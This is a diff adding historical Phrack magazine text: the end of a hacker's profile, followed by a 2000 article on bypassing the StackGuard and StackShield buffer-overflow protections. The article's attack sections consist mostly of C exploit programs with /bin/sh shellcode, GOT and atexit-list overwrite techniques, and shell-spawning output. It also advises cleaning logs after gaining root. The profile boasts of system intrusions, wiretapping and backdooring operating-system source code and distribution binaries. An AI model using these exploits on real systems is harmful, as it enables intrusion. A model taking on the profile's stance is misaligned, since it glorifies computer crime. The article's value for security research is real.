+Being invited to join the Phone Losers of America by el_jefe.  (Anyone other
+than myself, dhate, and el_jefe who claims PLA is a poser.  Especially RBCP
+and his band of gay doodleboys.)
+
+Meeting tr0ut (by hacking a system he was using) & joining H4G1S in its
+infancy.
+
+First root shell on a 5ESS.  
+
+Yahoo!
+
+Two words.. Jay Dyson.  
+
+The first (root-yielding) hole I found in UNIX. 
+
+The first exploit I ever stole.  
+
+The first exploit I ever wrote.
+
+Mastering digital wiretapping.
+
+Being woken up by FBI agents.
+
+Monitoring a certain computer security expert from California who appeared in
+Wired Magazine along with Mark Lottor as "V.T." in an article written by John
+Markoff about cellular phreaking.  (Restore your honor.. come and get me, big
+guy.  And get busted for eavesdropping on phonesex!@)
+
+When dk, prym, and I forwarded a certain Phrack editor's phone line to a
+bridge, and took all his calls for a weekend.  (Sorry about that, route..
+water under the bridge ;))
+
+    [ EdNote: it wasn't for a weekend fuck0!  It was for a day (I disconnected
+      the number that afternoon -- and I still remember it because it was so
+      elite: 2801600). ]
+
+IRC'ing as erikb. 
+
+Mocking "security expert" Scott Yelich while breaking into his 'secure'
+machine, security.spy.org.  (He ended up pulling his cables.. lame).
+
+Owning everyone and everything. 
+
+c4p3b0y vs. andy 0f m4yb3rry
+
+autoreplyd
+
+groktelnet
+
+Backdooring the source code of several popular commercial & free operating
+systems, and binary distributions of popular packages at their distro sites.
+(I'll bet that gives you a warm, fuzzy feeling just thinking about it.)  
+
+Cheating on every online game in existence for laughs (a lot of them with DK)
+
+kibitz on beelzebub (y0y0 neal!)
+
+Writing BoW 9 with U4EA, Lister, and DK
+
+All the funny prank calls, especially with el_jefe, dhate, U4EA & DK. 
+
+My first con (pumpcon).. the kind of experience that's memorable because
+nobody lets you forget it ;)
+
+whackpack.hilarious.log
+
+gay.log
+
+our short-lived young apprentice (dead_rat of the LoD!@##$)
+
+elastic's 'creatively edited' logs
+
+sloppy's ass mailing list & everything associated with it - 50mb of email
+a day, getting threatened with lawsuits by Captain Zap (world-class retard,
+belongs in the meinel-vranesevich-shipley-brianmartin trashcan), Agent Steal's
+400k ego rants, elastic's incoherent & hilarious ravings, etc etc. 
+
+SEAWORLD ADVENTURE SARLO
+
+Oh yeah, and boards to mention:
+
+The Forbidden City 
+Ripco
+The Toll Center
+Demon Roach Underground
+The Station
+Error 23
+Realms of Valor
+
+|-------------------------------- Q U O T E Z --------------------------------|
+
+GO AWAY PLA!
+
+It's not paranoia if they're really after you.
+
+leggo my eggo
+
+pea *SPINS*
+
+"KTHNX!"
+-pea
+
+???
+
+P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97
+
+P4NTZ/H4G1S - GL0B4L D0M1N4Ti0N '97 - PR1S0N '98
+
+If you're not owned by H4G1S, you're not worth owning.
+If you're not worth owning, you're probably owned by H4G1S anyway.
+
+'$show users /full/int/givemesysprivs'
+
+"yeah, but, uh, how are we supposed to chmod chmod?"
+
+"dog" 
+ - tr0ut
+
+Welcome to OpenBSD: The proactively secure Unix-like operating system.
+
+"The dragons breath was warm and damp, it fogged up the mirror, I wiped the
+mirror with a tissue, the tissue tore, the dragon swallowed the damp tissue 
+whole." (probably not exact)
+ - tr0ut
+
+"f dragons"
+
+ - tr0ut
+
+ y0y0y0, sl0ppy 0n the m1c
+ watch my h1p tr1x 0n da bmx b1ke
+ I'm whirlin' and twirlin' like a bat 0utta hell
+ d00d, that stench, it's me, I smell!
+ 0n the payph0nez iz where I l1ke t0 be
+ call1ng ppl I d0nt even kn0w in TURKEY!
+ HEHEHE! I have a psychopathic streak!
+ messaging st4r ab0ut drag0nz iz when I'm at my peak!
+ g00d g0d r0d, that tissue is damp!
+ watch th1s 360 of the handicap r4mp!
+ 0ff I g0, b1king int0 the sun
+ tissuez and payph0nez, my life iz s0 fun!
+
+- tr0ut freestyling on the topic of the official H4G1S BMXer
+
+"what's a golden shower?" 
+<2 minutes later> "this is waq.. you can see people peeing!"
+- sloppy
+
+"hmm, huh, hrmm, duh, drhfhfhfmasfh rhummm shoelaces?"
+
+"Don't question my technical abilities!" 
+- Agent Steal
+
+"I hate JP more than I hate banana candy" 
+ - dk
+
+"We're so money and we don't even know it"
+ - dk
+
+"i've had a lot of practice swordfighting underwater"
+
+"-shep-" 
+-u4ea
+
+"Do they live in each others basements?" 
+- eubern1g
+
+"Waaleikum Pastrami!"
+ - eubern1g
+
+"Summa Sedes Non Capit Duos"
+
+
+I would like to include a lot of other things the people listed below have
+said that aren't included here - most of them are often pretty witty & funny.
+A lot of stupid things that people have said crossed my mind as well, but I
+decided I didn't want their words showing up in my Quotes.. :)  
+
+But, since I wrote this up from memory, and also due to space limitations,
+this is not possible..
+
+Oh well.
+
+
+|--------- T H E  F U T U R E   O F   T H E   U N D E R G R O U N D ----------|
+
+Asking this question is analogous to asking a question about the future of
+8-tracks or dodo birds.
+
+The underground is no longer underground.  Forums which once existed for the
+discussion of hacking/phreaking, and the use of technology toward that end,
+now exist for bands of semi-skilled programmers and self-proclaimed security
+experts to yammer about their personal lives, which exist almost entirely on
+the awful medium known as IRC.  The BBS, where the hack/phreak underground
+grew from, is long since dead.  Any chump can buy access to the largest
+network in the world for $19.95 a month, then show up on IRC or some other
+equally lame forum, claiming to be a hacker because they read bugtraq and can
+run exploits (or even worse, because they can utilize denial-of-service
+attacks). The hacker mindset has become a nonexistent commodity in the new
+corporate and media-friendly 'underground.'
+
+And everyone who was a real part of the hacking/phreaking scene - at one point
+or another decided they'd rather make money being legit than risk legal
+troubles and wrecking their future for nothing.  Myself included.
+
+The watered down underground's definition of a hacker is invariably something
+like: "Someone who can code," or "Someone who can hack webpages," etc.
+
+The motives and goals of this 'scene' are also entirely different, and it can
+be safely concluded that it will continue to degenerate further, at a rapid
+pace.  
+
+On the flip side, going legit is a good thing... I, for one, would rather be
+on the right side of the law, and getting paid for it - it was fun while it
+lasted, and I learned a lot, but we all have to grow up sometime.  
+
+And for those just getting into it now - why hack?  All the knowledge and
+information you could possibly want is available at the click of a button in
+any web browser (or push of an arrow, in Lynx).  
+
+If you instinctively and successfully refuted the last two paragraphs of
+bullshit logic... then you belong.  
+
+
+|---------------------------- S H O U T O U T Z  -----------------------------|
+
+eubern1g, el_jefe, dhate, sl/tr0ut, sloppy, dk, neal, u4ea, dw, lurid, adamw,
+fryguy, sarlo, sn, prym, plaguez, elastic, netw1z, route, redragon/djm, jennie,
+acid phreak, number6, pea, fatalist, marauder, tabas, kwei, ratscabies..
+anyone BoW MOD or H4G1S that i missed & anyone else i missed .. the el8z
+know who they are :)
+
+I'd like to give a separate shout-out to these following unnamed individuals, 
+who shall be known by the arbitrary pseudonyms of: 
+
+oraclepunk, cheez, dos_tomates, the R&D militiamen, macgyver, SAF 1 & 'iblis'
+
+(Don't ask.)
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/5.txt b/phrack56/5.txt
new file mode 100644
index 0000000..ae1c6c1
--- /dev/null
+++ b/phrack56/5.txt
@@ -0,0 +1,720 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x05[0x10]
+
+|------------------- BYPASSING STACKGUARD AND STACKSHIELD --------------------|
+|-----------------------------------------------------------------------------|
+|--------------------- Bulba and Kil3r <lam3rz@hert.org> ---------------------|
+
+
+
+----|  Preface
+
+"When a buffer overwrites a pointer...  The story of a restless mind."
+
+
+This article is an attempt to demonstrate that it is possible to exploit
+stack overflow vulnerabilities on systems secured by StackGuard or StackShield 
+even in hostile environments (such as when the stack is non-executable).
+
+
+----| StackGuard Overview
+
+According to its authors, StackGuard is a "simple compiler technique that
+virtually eliminates buffer overflow vulnerabilities with only modest
+performance penalties." [1]
+
+We assume that the reader know how buffer overflow attacks work and how to
+write exploit code . If this is foreign to you, please see P49-14.
+
+In a nutshell, we can change a function's return address by writing past the
+end of local variable buffer.  The side effect of altering a function's return
+address is that we destroy/modify all stack data contained beyond end of the
+overflowed buffer.
+
+What does StackGuard do?  It places a "canary" word next to the return address
+on the stack.  If the canary word has been altered when the function returns,
+then a stack smashing attack has been attempted, and the program responds by
+emitting an intruder alert into syslog, and then halts. 
+
+Consider the following figure:
+
+	...				    ...
+	 |-----------------------------------|
+	 | parameters passed to function     | 
+	 |-----------------------------------|
+	 | function's return address (RET)   | 
+	 |-----------------------------------|
+	 | canary                            |
+	 |-----------------------------------|
+	 | local frame pointer (%ebp)        |
+	 |-----------------------------------|
+	 | local variables                   |
+	 |-----------------------------------|
+	...				    ...
+
+
+To be effective, the attacker must not be able to "spoof" the canary word
+by embedding the value for the canary word in the attack string.  StackGuard
+offers two techniques to prevent canary spoofing: "terminator" and "random".
+
+A terminator canary contains NULL(0x00), CR (0x0d), LF (0x0a) and EOF (0xff) --
+four characters that should terminate most string operations, rendering the
+overflow attempt harmless.
+
+A random canary is chosen at random at the time the program execs.  Thus the
+attacker cannot learn the canary value prior to the program start by searching
+the executable image.  The random value is taken from /dev/urandom if
+available, and created by hashing the time of day if /dev/urandom is not
+supported.  This randomness is sufficient to prevent most prediction attempts.
+
+
+----|  StackShield
+
+StackShield uses a different technique.  The idea here is to create a separate
+stack to store a copy of the function's return address.  Again this is achieved
+by adding some code at the very beginning and the end of a protected function.
+The code at the function prolog copies the return address to special table,
+and then at the epilog, it copies it back to the stack.  So execution flow
+remains unchanged -- the function always returns to its caller.  The actual
+return address isn't compared to the saved return address, so there is no way
+to check if a buffer overflow occurred.  The latest version also adds some
+protection against calling function pointers that point at address not
+contained in .TEXT segment (it halts program execution if the return value
+has changed).  
+
+It might seem like these two systems are infallible.  They're not.
+
+
+----|  "Nelson Mengele must be free"
+
+"...an attacker can bypass StackGuard protection using buffer overflows to
+ alter other pointers in the program besides the return address, such as
+ function pointers and longjmp buffers, which need not even be on the
+ stack." [2]
+
+OK.  So.  Do we need a bit of luck to overflow a function pointer or a longjmp?
+You bet!  It's not exactly commonplace to find such a pointer located after
+our buffer, and most programs do not have it at all.  It is much more likely
+to find some other kind of pointer.  For example:
+
+
+[root@sg StackGuard]# cat vul.c 
+
+// Example vulnerable program.
+int f (char ** argv)
+{
+        int pipa;	// useless variable
+        char *p;
+        char a[30];
+
+        p=a;
+
+        printf ("p=%x\t -- before 1st strcpy\n",p);
+        strcpy(p,argv[1]);        // <== vulnerable strcpy()
+        printf ("p=%x\t -- after 1st  strcpy\n",p);
+        strncpy(p,argv[2],16);
+        printf("After second strcpy ;)\n");
+}
+
+main (int argc, char ** argv) {
+        f(argv);
+        execl("back_to_vul","",0);  //<-- The exec that fails
+        printf("End of program\n");
+}
+
+
+As you can see, we just overwrite the return address by overflowing our buffer.
+But this will get us nowhere since our program is StackGuard protected.  But
+the simplest, obvious route is not always the best one.  How about we just
+overwrite the `p` pointer?  The second (safe) strncpy() operation will go
+straight to memory pointed by us.  What if p points at our return address on
+the stack?  We're altering the function's return without even touching the
+canary.
+
+So what do we require for our attack?
+1. We need pointer p to be physically located on the stack after our buffer
+   a[].
+2. We need an overflow bug that will allow us to overwrite this p pointer
+   (i.e.: an unbounded strcpy).
+3. We need one *copy() function (strcpy, memcopy, or whatever) that takes
+   *p as a destination and user-specified data as the source, and no p
+   initialization between the overflow and the copy.
+
+Obviously, given the above limitations not all programs compiled with
+StackGuard are going to be vulnerable, but such a vulnerabilities are out
+there.  For example, the wu-ftpd 2.5 mapped_path bug, where overflowing the
+mapped_path buffer could alter the Argv and LastArg pointers used by
+setproctitle() resulting in the ability to modify any part of the process'
+memory.  Granted, it was *data* based overflow (not stack-based) but, on
+the other hand, this shows that the requirements for our above vulnerability
+are definitely fulfilled in real world.
+
+So how are we going to exploit it?
+
+We overwrite p so it will point to the address of RET on the stack and thus
+the next *copy() will overwrite our RET without touching the canary :)  Yes,
+we need to smuggle in the shellcode as well (we use argv[0]).  Here is a
+sample exploit (we used execle() to make it environment independent):
+
+[root@sg StackGuard]# cat ex.c
+
+/* Example exploit no. 1 (c) by Lam3rZ 1999 :) */
+
+char shellcode[] =
+    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
+    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
+    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
+    "\xff\xff/bin/sh";
+char addr[5]="AAAA\x00";
+
+char buf[36];
+int * p;
+
+main() {
+    memset(buf,'A',32);
+    p = (int *)(buf+32);
+    *p=0xbffffeb4;	//  <<== let us point at RET
+    p = (int *)(addr);
+    *p=0xbfffff9b;	//  <<== new RET value
+
+    execle("./vul",shellcode,buf,addr,0,0);
+}
+
+
+As tested on a StackGuarded RH 5.2 Linux box:
+
+    [root@sg StackGuard]# gcc vul.c -o vul
+    [root@sg StackGuard]# gcc ex.c
+    [root@sg StackGuard]# ./a.out
+    p=bffffec4       -- before 1st strcpy
+    p=bffffeb4       -- after 1st  strcpy
+    bash#
+
+As you can see, the first strcpy() overwrites p, then strncpy() copies the new
+RET value so that when it returns it takes address of our shellcode.  Kaboom!
+
+This technique works with programs compiled with regular gcc or StackGuarded
+gcc, but StackShield compiled programs are proof against this.
+
+
+----|  There is no spoon
+
+I talked with Crispin Cowan <crispin@cse.ogi.edu>, one of the StackGuard
+developers and he proposed a remediation against above hack.  Here's his
+idea:
+
+"The XOR Random Canary defense:  here, we adopt Aaron Grier's ancient
+ proposal to xor the random canary with the return address.  The canary
+ validation code used on exit from functions then XOR's the return address
+ with the proper random canary (assigned to this function at exec() time)
+ to compute what the recorded random canary on the stack should be.  If the
+ attacker has hacked the return address, then the xor'd random canary will
+ not match.  The attacker cannot compute the canary to put on the stack
+ without knowing the random canary value.  This is effectively encryption
+ of the return address with the random canary for this function.
+
+ The challenge here is to keep the attacker from learning the random 
+ canary value.  Previously, we had proposed to do that by just surrounding
+ the canary table with red pages, so that buffer overflows could not be
+ used to extract canary values.  However, Emsi's [described above] attack
+ lets him synthesize pointers to arbitrary addresses."
+
+ (The simplest solution there is to) "mprotect() the canary table to prevent
+ the attacker from corrupting it."
+
+We informed Crispin that we're going to write an article about it and his
+response was:
+
+ "I think we can have a revised StackGuard compiler (with the XOR random
+ canary) ready for release on Monday."
+
+That compiler has been released. [3]
+
+StackShield offers an (almost) equal level of security by saving the RET copy
+in safe place (of arbitrary location and size -- not necessarily a good
+practice however) and checking its integrity before doing the return.
+
+We can bypass that.
+
+If we have a pointer that can be manipulated, we can use it to overwrite
+things that can help us exploit a vulnerable overflow in a program.  For
+example, take the fnlist structure that holds functions registered via
+atexit(3) or on_exit(3).  To reach this branch of code, of course, the program
+needs to call exit(), but most programs do this either at the end of execution
+or when an error occurs (and in most cases we can force an error exception).
+
+Let's look at the fnlist structure:
+
+    [root@sg StackGuard]# gdb vul
+    GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
+    [...]
+    This GDB was configured as "i386-redhat-linux"...
+    (gdb) b main    
+    Breakpoint 1 at 0x8048790
+    (gdb) r         
+    Starting program: /root/StackGuard/c/StackGuard/vul 
+
+    Breakpoint 1, 0x8048790 in main ()
+    (gdb) x/10x &fnlist 
+0x400eed78 <fnlist>:    0x00000000      0x00000002      0x00000003      0x4000b8c0
+0x400eed88 <fnlist+16>: 0x00000000      0x00000003      0x08048c20      0x00000000
+0x400eed98 <fnlist+32>: 0x00000000      0x00000000
+
+
+We can see that it calls two functions: _fini [0x8048c20] and _dl_fini
+[0x4000b8c0] and that neither of these take any arguments (checkout glibc
+sources to understand how to read the fnlist content).  We can overwrite both
+of these functions.  The fnlist address is dependent on the libc library, so it
+will be the same for every process on a particular machine.
+
+The following code exploits a vulnerable overflow when the program exits
+via exit():
+
+[root@sg StackGuard]# cat 3ex.c 
+/* Example exploit no. 2 (c) by Lam3rZ 1999 :) */
+
+char shellcode[] =
+    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
+    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
+    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
+    "\xff\xff/bin/sh";
+char addr[5]="AAAA\x00";
+
+char buf[36];
+int * p;
+
+main() {
+    memset(buf,'A',32);
+    p = (int *)(buf+32);
+    *p=0x400eed90;	// <<== Address of entry in fnlist which we'll modify
+    p = (int *)(addr);
+    *p=0xbfffff9b;	// <<== Address of new function to call (shellcode) :)
+    execle("./vul",shellcode,buf,addr,0,0);
+}
+
+As you can see our exploit has changed only by one line :)
+
+Let's test it against our vulnerable program:
+
+    [root@sg StackGuard]# gcc 3ex.c 
+    [root@sg StackGuard]# ./a.out 
+    p=bffffec4       -- before 1st strcpy
+    p=400eed90       -- after 1st  strcpy
+    After second strcpy ;)
+    End of program
+    bash# 
+
+As you can see our program gave us a shell after the end of normal execution.
+Neither StackGuard nor StackShield cannot protect against this kind of attack.
+
+But what if our program do not call exit() but uses _exit() instead?
+
+Let's see what happens when we overwrite the canary.  A StackGuarded program
+will call __canary_death_handler() (this function is responsible for logging
+the overflow attempt and terminating the process).  Let's look at it:
+
+    void __canary_death_handler (int index, int value, char pname[]) {
+      printf (message, index, value, pname) ;
+      syslog (1, message, index, value, pname) ;
+      raise (4) ;
+      exit (666) ;
+    }
+
+As you can see, we have a call to exit() at the very end.  Granted, exploiting
+the program this way will generate logs, but if there is no other way, it's
+a necessary evil.  Besides, if you get root, you can just groom them later.
+
+We received some email from Perry Wagle <wagle@cse.ogi.edu> (another
+Stackguard author): "I seem to have lost my change to have it call _exit()
+instead...".  Currently StackGuard calls _exit().
+
+Of course the above hack does not apply to StackShield.  StackShield protection
+can be bypassed by overwriting the saved %ebp which is not protected.  One
+way of exploiting it (under the worst conditions) was described in "The
+Frame Pointer Overwrite" by klog in Phrack 55 [4].  When program is compiled
+using StackShield with the '-z d' option it calls _exit() but this is not a
+problem for us.
+
+
+----|  Discovering the America
+
+What if a system has been protected with StackGuard *and* StackPatch (Solar
+Designer's modification that makes stack nonexecutable)? Is *this* the worst
+case scenario?  Not quite.
+
+We developed a clever technique that can be used if none of the above methods
+can be used.
+
+The reader is directed to Rafal Wojtczuk's wonderful paper "Defeating
+Solar Designer's Non-executable Stack Patch" [5].  His great idea was to
+patch the Global Offset Table (GOT).  With our vulnerability we can produce
+an arbitrary pointer, so why not point it to the GOT?
+
+Let's use our brains.  Look at vulnerable program:
+
+        printf ("p=%x\t -- before 1st strcpy\n",p);
+        strcpy(p,argv[1]);
+        printf ("p=%x\t -- after 1st  strcpy\n",p);
+        strncpy(p,argv[2],16);
+        printf("After second strcpy :)\n");
+
+Yes.  The program writes our content (argv[2]) to our pointer then it
+executes library code, printf().  OK, so what we need to do is to overwrite
+the GOT of printf() with the libc system() address so it will execute
+system("After second strcpy :)\n");  Let's test it in practice.  To do this,
+we disassemble the Procedure Linkage Table (PLT) of printf().
+
+    [root@sg]# gdb vul
+    GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
+    [...]
+    This GDB was configured as "i386-redhat-linux"...
+    (gdb) x/2i printf
+    0x804856c <printf>:     jmp    *0x8049f18  <- printf()'s GOT entry
+    0x8048572 <printf+6>:   pushl  $0x8
+    (gdb)
+
+OK, so printf()'s GOT entry is at 0x8049f18.  All we need is to put the libc
+system() address at this location, 0x8049f18.  According to Rafal's article we
+can calculate that our system() address is at: 0x40044000+0x2e740.  0x2e740 is
+an offset of __libc_system() in libc library:
+
+    [root@sg]# nm /lib/libc.so.6| grep system
+    0002e740 T __libc_system
+    0009bca0 T svcerr_systemerr
+    0002e740 W system
+
+[ Note: the reader might notice we didn't use a kernel with Solar's patch.
+We were having problems with init(8) halting after boot.  We were running out
+of time to get this article done so we decided to go without the kernel patch.
+All that would change is the 0x40.  On systems with Solar's patch, libc is
+at 0x00XXYYZZ.  So, for example, the above address would look like
+0x00044000+0x2e740, the 0x00 at the beginning will terminate our string.
+We're not 100% positive that StackPatch is compatible with StackGuard, it
+SHOULD be, and even if it isn't, it CAN be...  But we're not sure yet..  If
+any knows, please drop us a note. ]
+
+OK, so let's test following exploit:
+
+[root@sg]# cat 3ex3.c
+/* Example exploit no. 3 (c) by Lam3rZ 1999 :) */
+
+char *env[3]={"PATH=.",0};
+char shellcode[] =
+    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
+    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
+    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
+    "\xff\xff/bin/sh";
+char addr[5]="AAAA\x00";
+char buf[46];
+int * p;
+
+main() {
+    memset(buf,'A',36);
+    p = (int *)(buf+32);
+    *p++=0x8049f18;//  <== printf() GOT entry address
+    p = (int *)(addr);
+    *p=0x40044000+0x2e740;//  <<== Address of libc system()
+    printf("Exec code from %x\n",*p);
+    execle("./vul",shellcode,buf,addr,0,env);
+}
+
+And test it!!!
+
+    [root@sg]# gcc 3ex3.c
+    [root@sg]# ./a.out
+    Exec code from 40072740
+    p=bffffec4       -- before 1st strcpy
+    p=8049f18        -- after 1st  strcpy
+    sh: syntax error near unexpected token `:)'
+    sh: -c: line 1: `After second strcpy :)'
+    Segmentation fault (core dumped)
+
+Hrm.  That didn't work.
+
+Unfortunately, as it happens, the printf() string contained special shell
+characters.  In most cases if we exploit printf() to execute system() it
+will execute things like "Here we blah, blah and blah", so all we need is
+to create a "Here" shell script in our working directory (yes, we need our
+suid program to not set the PATH variable).
+
+So what to do with our unexpected ':)' token?
+
+Well it depends, sometimes you just have to forget about printf() and try to
+find a function that is executed after our exploitation, such that it takes
+plain text as the last argument.  Sometimes, however, we can get luckier...
+Imagine that our a[] buffer is the last local variable, so arguments passed on
+to functions called by our vulnerable function are just next to it on stack.
+What if we persuade __libc_system() to skip the canary pushing?  We can achieve
+that by jumping to __libc_system()+5 instead of __libc_system().  Well, we'll
+end up with +arguments shifted one place forward (i.e. arg1->arg2...), and
+the first 4 bytes of the last local variable on the stack are treated as the
+first argument.  The printf() call we're trying to abuse takes just one
+argument, so the only argument that system() will get is pointer contained in
+the first 4 bytes of a[].  Just make it point to "/bin/sh" or something
+similar.
+
+Overwriting the GOT works for StackGuard, StackShield and StackPatch.  It can
+be used in case we cannot manipulate the whole content of what we're copying 
+but only parts of it (as in wu-ftpd).
+
+
+----|  "Oily way"
+
+The reader may think we're only showing her naive examples, that are probably
+not going to be found in the field.  A vulnerable function that gets as its
+arguments a whole table of strings is somewhat uncommon.  More often you'll
+find functions that look like this:
+
+int f (char *string) {
+[...]
+    char *p;
+    char a[64];
+[...]
+
+
+Check this out:
+
+char dst_buffer[64]; /* final destination */
+
+int f (char * string)
+{
+    char *p;
+    char a[64];
+
+    p=dst_buffer;		/* pointer initialization */
+    printf ("p=%x\t -- before 1st strcpy\n",p);
+    strcpy(a, string);  	/* string in */
+
+	/* parsing, copying, concatenating ... black-string-magic */
+	/* YES, it MAY corrupt our data */
+
+    printf ("p=%x\t -- after 1st  strcpy\n",p);
+    strncpy(p, a, 64);  	/* string out */
+    printf("After second strcpy ;)\n");
+}
+
+int main (int argc, char ** argv) {
+    f(argv[0]);                	/* interaction */
+    printf("End of program\n");
+}
+
+
+You interact with the vulnerable function by passing it just one string...
+
+But what if we're dealing with a system that has nonexecutable stacks,
+and libraries mapped to some strange address (with NULLs inside of it)?
+We cannot patch the GOT with our address on the stack, because stack is
+not executable.
+
+It may look like we're screwed, but read on!  Our system is x86 based, and
+there are a lot of misconceptions about the ability to execute certain memory
+pages.  Check out /proc/*/maps:
+
+    00110000-00116000 r-xp 00000000 03:02 57154
+    00116000-00117000 rw-p 00005000 03:02 57154
+    00117000-00118000 rw-p 00000000 00:00 0
+    0011b000-001a5000 r-xp 00000000 03:02 57139
+    001a5000-001aa000 rw-p 00089000 03:02 57139
+    001aa000-001dd000 rw-p 00000000 00:00 0
+    08048000-0804a000 r-xp 00000000 16:04 158
+    0804a000-0804b000 rw-p 00001000 16:04 158      <-- The GOT is here
+    bfffd000-c0000000 rwxp ffffe000 00:00 0
+
+The GOT may seem to be non-executable, but SUPRISE!  Good ole' Intel allows
+you to execute the GOT where ever you wish!  So all we have to do is stick
+our shellcode there, patch the GOT entry to point to it, and sit back and
+enjoy the show!
+
+To facilitate that, here's a little hint:
+We just have to change two lines in supplied exploit code:
+
+    *p=0x8049f84;		// destination of our strncpy operation
+    [...]
+    *p=0x8049f84+4;		// address of our shellcode
+
+
+All we need is a copy operation that can copy the shellcode right where we
+want it.  Our shellcode is not size optimized so it takes more than 40 bytes,
+but if you're smart enough you can make this code even smaller by getting rid
+of jmp, call, popl (since you already know your address).
+
+Another thing we have to consider are signals.  A function's signal handler
+tries to call a function with a fucked up GOT entry, and program dies.  But
+that is just a theoretical danger.
+
+What's that now?
+
+You don't like our vulnerable program?
+
+It still looks somewhat unreal to you? 
+
+Then maybe we'll satisfy you with this one:
+
+char global_buf[64];
+
+int f (char *string, char *dst)
+{
+        char a[64];
+
+        printf ("dst=%x\t -- before 1st strcpy\n",dst);
+        printf ("string=%x\t -- before 1st strcpy\n",string);
+        strcpy(a,string);
+        printf ("dst=%x\t -- after 1st  strcpy\n",dst);
+        printf ("string=%x\t -- after 1st  strcpy\n",string);
+
+	    // some black magic is done with supplied string
+
+        strncpy(dst,a,64);
+        printf("dst=%x\t -- after second strcpy :)\n",dst);
+}
+
+main (int argc, char ** argv) {
+
+        f(argv[1],global_buf);
+        execl("back_to_vul","",0);  //<-- The exec that fails
+                                    // I don't have any idea what it is for
+				    // :)
+        printf("End of program\n");
+}
+
+
+
+In this example we have our pointer (dst) on the stack beyond the canary and
+RET value, so we cannot change it without killing the canary and without
+being caught...
+
+Or can we?
+
+Both StackGuard and StackShield check whether RET was altered before the
+function returns to its caller (this done at the very end of function).  In
+most cases we have enough time here to do something to take control of a
+vulnerable program.
+
+We can do it by overwriting the GOT entry of the next library function called.
+
+We don't have to worry about the order of local variables and since we don't
+care if canary is alive or not, we can play!
+
+Here is the exploit:
+
+/* Example exploit no. 4 (c) by Lam3rZ 1999 :) */
+
+char shellcode[] = // 48 chars :)
+    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
+    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
+    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
+    "\xff\xff/bin/sh";
+
+char buf[100];
+int * p;
+
+main() {
+    memset(buf,'A',100);
+    memcpy(buf+4,shellcode,48);
+    p = (int *)(buf+80);    // <=- offset of second f() argument [dest one]
+    *p=0x8049f84;//  <<== GOT entry of printf
+
+    p = (int *)(buf);
+    *p=0x8049f84+4;//  <<== GOT entry of printf+4, there is our shellcode :)
+
+    execle("./vul2","vul2",buf,0,0);
+}
+
+And the result: 
+
+    [root@sg]# ./a.out 
+    p=804a050        -- before 1st strcpy
+    argv1p=bfffff91  -- before 1st strcpy
+    p=8049f84        -- after 1st  strcpy
+    argv1=41414141   -- after 1st  strcpy
+    bash# 
+
+
+----|  Conclusion
+
+1) StackGuard/StackShield can save you in case of accidental buffer overflows, 
+   but not against a programmer's stupidity.  Erreare humanum est, yeah
+   right, but security programmers must not only be human, they must be
+   security-aware-humans.
+
+2)  - By auditing your code - you may waste some time but you'll surely
+    increase the security of the programs you're writing.
+    - By using StackGuard/StackShield/whatever - you may decrease your system
+    performance but in turn you gain additional layer of security.
+    - By doing nothing to protect your program - you risk that someone will
+    humiliate you by exploiting an overflow in your code, and if it happens,
+    you deserve it!
+
+    So, be perfect, be protected, or let the others laugh at you.
+
+We welcome any constructive comments and improvements.  You can contact us
+on Lam3rZ mailing list at <lam3rz@hert.org>.
+
+Yes, yes... We know!  No real working exploit yet :( We're working on it.
+Keep checking:
+
+        http://emsi.it.pl/
+and
+        http://lam3rz.hack.pl/
+
+
+----|  Addendum: Jan 5, 2000
+
+We solved the problem with StackGuard on a system with Solar Designer's
+non-executable stack patch.  We're not sure what caused the problem, but to
+avoid it, enable 'Autodetect GCC trampolines' and 'Emulate trampoline calls'
+during kernel configuration.  We were running Slackware Linux without
+StackGuard and trampolines but with non-executable user stack but StackGuarded
+RH Linux refused to work in such a configuration... :)
+
+
+----|  Some GreetZ
+
+A18 team, HERT, CocaCola, Raveheart (for "Nelson Mengele..." song).
+Nergal, moe by si tak ujawni? ;)
+Po raz kolejny chcialbym zaznaczyc, ze jestem tylko zwyczajnym Lam3rem.
+                                                                     
+    - Kil3r
+
+people I've been drinking with - because i've been drinking with you :)
+people I'd like to drink with  - because i will drink with you :) 
+people smarter than me         - because you're better than I am
+ʣӯ1/4               - for being wonderful iso-8859-2 characters
+Lam3rz                         - alt.pe0p1e.with.sp311ing.pr0b1emZ :)
+koralik                        - ... just because
+
+    - Bulba
+
+
+----|  References
+
+[1] Crispin Cowan, Calton Pu, Dave Maier, Heather Hinton, Jonathan Walpole,
+Peat Bakke, Steave Beattie, Aaron Grier, Perry Wagle and Qian Zhand.
+StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow
+Attacks http://www.immunix.org/documentation.html
+
+[2] Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle
+and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with
+StackGuard http://www.immunix.org/documentation.html
+
+[3] Security Alert: StackGuard 1.21
+http://www.immunix.org/downloads.html
+
+[4] klog. The Frame Pointer Overwrite
+http://www.phrack.com/search.phtml?view&article=p55-8
+
+[5] Rafal Wojtczuk. Defeating Solar Designer's Non-executable Stack Patch
